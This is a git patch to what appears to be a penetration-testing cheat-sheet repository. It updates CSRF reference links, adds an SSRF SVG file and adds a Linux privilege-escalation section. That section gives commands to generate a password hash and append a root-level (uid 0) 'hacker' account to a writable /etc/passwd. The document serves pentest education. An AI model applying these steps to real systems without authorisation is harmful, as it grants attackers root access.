From 546ecd0e368591c2d1e0ca7f5928223989f3ffb8 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 7 Apr 2019 23:40:36 +0200 Subject: [PATCH] Linux Privesc - /etc/passwd writable --- CSRF Injection/README.md | 17 +++++----- .../Linux - Privilege Escalation.md | 31 ++++++++++++++++--- .../Files/ssrf_iframe.svg | 9 ++++++ 3 files changed, 44 insertions(+), 13 deletions(-) create mode 100644 Server Side Request Forgery/Files/ssrf_iframe.svg diff --git a/CSRF Injection/README.md b/CSRF Injection/README.md index c6bc4f0..7deed48 100644 --- a/CSRF Injection/README.md +++ b/CSRF Injection/README.md @@ -93,12 +93,13 @@ xhr.send('{"role":admin}'); - [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016](https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/) - [Cross-Site Request Forgery (CSRF) - OWASP](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)) -- [Messenger.com CSRF that show you the steps when you check for CSRF](https://whitton.io/articles/messenger-site-wide-csrf/) by Jack Whitton -- [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack)](https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/) by Florian Courtial -- [Hacking PayPal Accounts with one click (Patched)](http://yasserali.com/hacking-paypal-accounts-with-one-click/) by Yasser Ali -- [Add tweet to collection CSRF](https://hackerone.com/reports/100820) by vijay kumar -- [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/) by phwd -- [How i Hacked your Beats account ? Apple Bug Bounty](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/) by @aaditya_purani -- [FORM POST JSON: JSON CSRF on POST Heartbeats API](https://hackerone.com/reports/245346) by Dr.Jones +- [Messenger.com CSRF that show you the steps when you check for CSRF - Jack Whitton](https://whitton.io/articles/messenger-site-wide-csrf/) +- [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial](https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/) +- [Hacking PayPal Accounts with one click (Patched) - Yasser Ali](http://yasserali.com/hacking-paypal-accounts-with-one-click/) +- [Add tweet to collection CSRF - vijay kumar](https://hackerone.com/reports/100820) +- [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun - phwd](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/) +- [How i Hacked your Beats account ? Apple Bug Bounty - @aaditya_purani](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/) +- [FORM POST JSON: JSON CSRF on POST Heartbeats API - Dr.Jones](https://hackerone.com/reports/245346) - [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf) -- [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/) \ No newline at end of file +- [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/) +- [Cross-Site Request Forgery Attack - PwnFunction](https://www.youtube.com/watch?v=eWEgUcHPle0) \ No newline at end of file diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 1b31a06..1421684 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -29,6 +29,7 @@ * [Doas](#doas) * [GTFOBins](#gtfobins) * [Wildcard](#wildcard) +* [Writable /etc/passwd](#writable---etc---passwd) * [NFS Root Squashing](#nfs-root-squashing) * [Shared Library](#shared-library) * [ldconfig](#ldconfig) @@ -297,6 +298,27 @@ tar cf archive.tar * Tool: [wildpwn](https://github.com/localh0t/wildpwn) +## Writable /etc/passwd + +First generate a password with one of the following commands + +```powershell +openssl passwd -1 -salt hacker hacker +mkpasswd -m SHA-512 hacker +python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")' +``` + +Then add the user `hacker` and add the generated password. + +```powershell +hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash +``` + +E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` + +You can now use the `su` command with `hacker:hacker` + + ## NFS Root Squashing When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it @@ -376,7 +398,6 @@ int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp } ``` - ## Groups ### Docker @@ -439,14 +460,14 @@ lxc start mycontainer lxc exec mycontainer /bin/sh ``` - ## References - [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/) -- [Privilege escalation via Docker - April 22, 2015 — Chris Foster](https://fosterelli.co/privilege-escalation-via-docker.html) -- [An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ AUGUST 21, 2018](https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/) +- [Privilege escalation via Docker - April 22, 2015 - Chris Foster](https://fosterelli.co/privilege-escalation-via-docker.html) +- [An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ - AUGUST 21, 2018](https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/) - [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/) - [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/) - [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt) - [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/) -- [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html) \ No newline at end of file +- [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html) +- [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) \ No newline at end of file diff --git a/Server Side Request Forgery/Files/ssrf_iframe.svg b/Server Side Request Forgery/Files/ssrf_iframe.svg new file mode 100644 index 0000000..2bb91d6 --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_iframe.svg @@ -0,0 +1,9 @@ + + + + + + + + + \ No newline at end of file